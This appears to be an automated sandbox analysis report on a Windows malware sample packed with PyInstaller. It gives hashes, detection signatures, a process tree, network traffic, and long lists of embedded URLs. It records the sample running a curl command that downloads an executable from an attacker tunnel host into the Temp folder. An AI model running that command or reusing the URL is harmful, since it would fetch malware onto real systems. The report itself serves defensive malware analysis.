Windows Analysis Report
aLsxeH29P2.exe

Overview

General Information

Sample name:aLsxeH29P2.exe
renamed because original name is a hash value
Original sample name:8bd6a723809e23d1c14d7ff528e16e996a3b0b0432e2b7feb4eb5db52c542173(1).exe
Analysis ID:1573003
MD5:43f63dde42af90b34befb25ca46e33d7
SHA1:2ad1824df97e3d1275521faed88ede96fe41e035
SHA256:8bd6a723809e23d1c14d7ff528e16e996a3b0b0432e2b7feb4eb5db52c542173
Tags:exe, loclx-io, user-JAMESWT_MHT

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Creates HTML files with .exe extension (expired dropper behavior)
AV process strings found (often used to terminate AV products)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Usage Of Web Request Commands And Cmdlets

Classification

  • System is w10x64
  • aLsxeH29P2.exe (PID: 7352 cmdline: "C:\Users\user\Desktop\aLsxeH29P2.exe" MD5: 43F63DDE42AF90B34BEFB25CA46E33D7)
    • aLsxeH29P2.exe (PID: 7368 cmdline: "C:\Users\user\Desktop\aLsxeH29P2.exe" MD5: 43F63DDE42AF90B34BEFB25CA46E33D7)
      • curl.exe (PID: 7384 cmdline: curl https://haxerr.eu.loclx.io/h4xt00l.exe --output C:\Users\user\AppData\Local\Temp\h4xt00l.exe MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
        • conhost.exe (PID: 7392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches
Source: Process started, Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: curl https://haxerr.eu.loclx.io/h4xt00l.exe --output C:\Users\user\AppData\Local\Temp\h4xt00l.exe, CommandLine: curl https://haxerr.eu.loclx.io/h4xt00l.exe --output C:\Users\user\AppData\Local\Temp\h4xt00l.exe, CommandLine|base64offset|contains: r, Image: C:\Windows\System32\curl.exe, NewProcessName: C:\Windows\System32\curl.exe, OriginalFileName: C:\Windows\System32\curl.exe, ParentCommandLine: "C:\Users\user\Desktop\aLsxeH29P2.exe", ParentImage: C:\Users\user\Desktop\aLsxeH29P2.exe, ParentProcessId: 7368, ParentProcessName: aLsxeH29P2.exe, ProcessCommandLine: curl https://haxerr.eu.loclx.io/h4xt00l.exe --output C:\Users\user\AppData\Local\Temp\h4xt00l.exe, ProcessId: 7384, ProcessName: curl.exe
No Suricata rule has matched

AV Detection

Source: https://haxerr.eu.loclx.io/h4xt00l.exe? Avira URL Cloud: Label: phishing
Source: https://haxerr.eu.loclx.io/h4xt00l.exe Avira URL Cloud: Label: phishing
Source: https://haxerr.eu.loclx.io/h4xt00l.exeQ Avira URL Cloud: Label: phishing
Source: https://haxerr.eu.loclx.io/h4xt00l.exe--outputC: Avira URL Cloud: Label: phishing
Source: aLsxeH29P2.exe, Virustotal: Detection: 50%
Source: aLsxeH29P2.exe, ReversingLabs: Detection: 36%
Source: unknown, HTTPS traffic detected: 167.99.38.229:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: aLsxeH29P2.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: aLsxeH29P2.exe, 00000000.00000003.1718939260.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: aLsxeH29P2.exe, 00000001.00000002.2975033574.00007FFDFB5F2000.00000002.00000001.01000000.00000004.sdmp, python312.dll.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: aLsxeH29P2.exe, 00000000.00000003.1719100028.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, unicodedata.pyd.0.dr
Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: libcrypto-3.dll.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: aLsxeH29P2.exe, 00000000.00000003.1714561302.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb$$ source: _decimal.pyd.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: aLsxeH29P2.exe, 00000000.00000003.1714677193.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\_decimal.pdb source: _decimal.pyd.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: aLsxeH29P2.exe, 00000000.00000003.1714677193.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: aLsxeH29P2.exe, 00000000.00000003.1714279446.0000021C0757F000.00000004.00000020.00020000.00000000.sdmp, _bz2.pyd.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: aLsxeH29P2.exe, 00000000.00000003.1714112999.0000021C0757E000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: libcrypto-3.dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: aLsxeH29P2.exe, 00000000.00000003.1714112999.0000021C0757E000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000001.00000002.2975654013.00007FFE126D3000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: libcrypto-3.dll.0.dr
Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: aLsxeH29P2.exe, 00000000.00000003.1714799794.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.0.dr
Source: C:\Users\user\Desktop\aLsxeH29P2.exe, Code function: 0_2_00007FF7F3DD9280 FindFirstFileExW,FindClose,0_2_00007FF7F3DD9280
Source: C:\Users\user\Desktop\aLsxeH29P2.exe, Code function: 0_2_00007FF7F3DD83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF7F3DD83C0
Source: C:\Users\user\Desktop\aLsxeH29P2.exe, Code function: 0_2_00007FF7F3DF1874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF7F3DF1874
Source: C:\Users\user\Desktop\aLsxeH29P2.exe, Code function: 1_2_00007FF7F3DD9280 FindFirstFileExW,FindClose,1_2_00007FF7F3DD9280
Source: C:\Users\user\Desktop\aLsxeH29P2.exe, Code function: 1_2_00007FF7F3DD83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00007FF7F3DD83C0
Source: C:\Users\user\Desktop\aLsxeH29P2.exe, Code function: 1_2_00007FF7F3DF1874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF7F3DF1874

Networking

Source: C:\Windows\System32\curl.exe, File created: h4xt00l.exe.2.dr
Source: Joe Sandbox View, JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, HTTP traffic detected: GET /h4xt00l.exe HTTP/1.1 Host: haxerr.eu.loclx.io User-Agent: curl/7.83.1 Accept: */*
Source: global traffic, DNS traffic detected: DNS query: haxerr.eu.loclx.io
Source: aLsxeH29P2.exe, 00000000.00000003.1718939260.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714677193.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714279446.0000021C0757F000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1717564560.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714799794.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714403552.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1719100028.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1715744414.0000021C0758D000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714561302.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1715744414.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _hashlib.pyd.0.dr, libcrypto-3.dll.0.dr, _bz2.pyd.0.dr, _lzma.pyd.0.dr, python312.dll.0.dr, unicodedata.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: aLsxeH29P2.exe, 00000000.00000003.1718939260.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714677193.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714279446.0000021C0757F000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1717564560.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714799794.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1715744414.0000021C07587000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714403552.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1719100028.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1715744414.0000021C0758D000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714561302.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _hashlib.pyd.0.dr, libcrypto-3.dll.0.dr, _bz2.pyd.0.dr, _lzma.pyd.0.dr, python312.dll.0.dr, unicodedata.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: aLsxeH29P2.exe, 00000000.00000003.1718939260.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714677193.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714279446.0000021C0757F000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1717564560.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714799794.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714403552.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1719100028.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714561302.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1715744414.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _hashlib.pyd.0.dr, libcrypto-3.dll.0.dr, _bz2.pyd.0.dr, _lzma.pyd.0.dr, python312.dll.0.dr, unicodedata.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: aLsxeH29P2.exe, 00000000.00000003.1718939260.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714677193.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714279446.0000021C0757F000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1717564560.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714799794.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1715744414.0000021C07587000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714403552.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1719100028.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714561302.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1715744414.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _hashlib.pyd.0.dr, libcrypto-3.dll.0.dr, _bz2.pyd.0.dr, _lzma.pyd.0.dr, python312.dll.0.dr, unicodedata.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: aLsxeH29P2.exe, 00000000.00000003.1718939260.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714677193.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714279446.0000021C0757F000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1717564560.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714799794.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714403552.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1719100028.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1715744414.0000021C0758D000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714561302.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1715744414.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _hashlib.pyd.0.dr, libcrypto-3.dll.0.dr, _bz2.pyd.0.dr, _lzma.pyd.0.dr, python312.dll.0.dr, unicodedata.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: aLsxeH29P2.exe, 00000000.00000003.1718939260.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714677193.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714279446.0000021C0757F000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1717564560.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714799794.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1715744414.0000021C07587000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714403552.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1719100028.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1715744414.0000021C0758D000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714561302.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _hashlib.pyd.0.dr, libcrypto-3.dll.0.dr, _bz2.pyd.0.dr, _lzma.pyd.0.dr, python312.dll.0.dr, unicodedata.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: aLsxeH29P2.exe, 00000000.00000003.1718939260.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714677193.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714279446.0000021C0757F000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1717564560.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714799794.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714403552.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1719100028.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714561302.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1715744414.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _hashlib.pyd.0.dr, libcrypto-3.dll.0.dr, _bz2.pyd.0.dr, _lzma.pyd.0.dr, python312.dll.0.dr, unicodedata.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: unicodedata.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: aLsxeH29P2.exe, 00000000.00000003.1718939260.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714677193.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714279446.0000021C0757F000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1717564560.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714799794.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1715744414.0000021C07587000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714403552.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1719100028.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1715744414.0000021C0758D000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714561302.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _hashlib.pyd.0.dr, libcrypto-3.dll.0.dr, _bz2.pyd.0.dr, _lzma.pyd.0.dr, python312.dll.0.dr, unicodedata.pyd.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: aLsxeH29P2.exe, 00000000.00000003.1718939260.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714677193.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714279446.0000021C0757F000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1717564560.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714799794.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1715744414.0000021C07587000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714403552.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1719100028.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1715744414.0000021C0758D000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714561302.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _hashlib.pyd.0.dr, libcrypto-3.dll.0.dr, _bz2.pyd.0.dr, _lzma.pyd.0.dr, python312.dll.0.dr, unicodedata.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0
Source: aLsxeH29P2.exe, 00000000.00000003.1718939260.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714677193.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714279446.0000021C0757F000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1717564560.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714799794.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1715744414.0000021C07587000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714403552.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1719100028.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714561302.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1715744414.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _hashlib.pyd.0.dr, libcrypto-3.dll.0.dr, _bz2.pyd.0.dr, _lzma.pyd.0.dr, python312.dll.0.dr, unicodedata.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0A
Source: aLsxeH29P2.exe, 00000000.00000003.1718939260.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714677193.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714279446.0000021C0757F000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1717564560.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714799794.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714403552.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1719100028.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1715744414.0000021C0758D000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714561302.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1715744414.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _hashlib.pyd.0.dr, libcrypto-3.dll.0.dr, _bz2.pyd.0.dr, _lzma.pyd.0.dr, python312.dll.0.dr, unicodedata.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0C
Source: aLsxeH29P2.exe, 00000000.00000003.1718939260.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714677193.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714279446.0000021C0757F000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1717564560.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714799794.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714403552.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1719100028.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714561302.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1715744414.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _hashlib.pyd.0.dr, libcrypto-3.dll.0.dr, _bz2.pyd.0.dr, _lzma.pyd.0.dr, python312.dll.0.dr, unicodedata.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0X
Source: Amcache.hve.1.drString found in binary or memory: http://upx.sf.net
Source: aLsxeH29P2.exe, 00000000.00000003.1718939260.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714677193.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714279446.0000021C0757F000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1717564560.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714799794.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1715744414.0000021C07587000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714403552.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1719100028.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1715744414.0000021C0758D000.00000004.00000020.00020000.00000000.sdmp, aLsxeH29P2.exe, 00000000.00000003.1714561302.0000021C07580000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _hashlib.pyd.0.dr, libcrypto-3.dll.0.dr, _bz2.pyd.0.dr, _lzma.pyd.0.dr, python312.dll.0.dr, unicodedata.pyd.0.drString found in binary or memory: http://www.digicert.com/CPS0
Source: aLsxeH29P2.exe, 00000001.00000002.2973738062.0000019FB0E8C000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.drString found in binary or memory: https://docs.python.org/3/howto/mro.html.
Source: aLsxeH29P2.exe, 00000001.00000002.2973738062.0000019FB0E10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
Source: aLsxeH29P2.exe, 00000001.00000002.2973738062.0000019FB0E8C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
Source: aLsxeH29P2.exe, 00000001.00000002.2973738062.0000019FB0E8C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
Source: aLsxeH29P2.exe, 00000001.00000002.2973738062.0000019FB0E8C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
Source: aLsxeH29P2.exe, 00000001.00000002.2973738062.0000019FB0E10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
Source: aLsxeH29P2.exe, 00000001.00000002.2974046958.0000019FB11F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
Source: aLsxeH29P2.exe, 00000001.00000002.2974046958.0000019FB11F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
Source: aLsxeH29P2.exe, 00000001.00000002.2973738062.0000019FB0E8C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
Source: aLsxeH29P2.exe, 00000001.00000002.2973425589.0000019FAF521000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
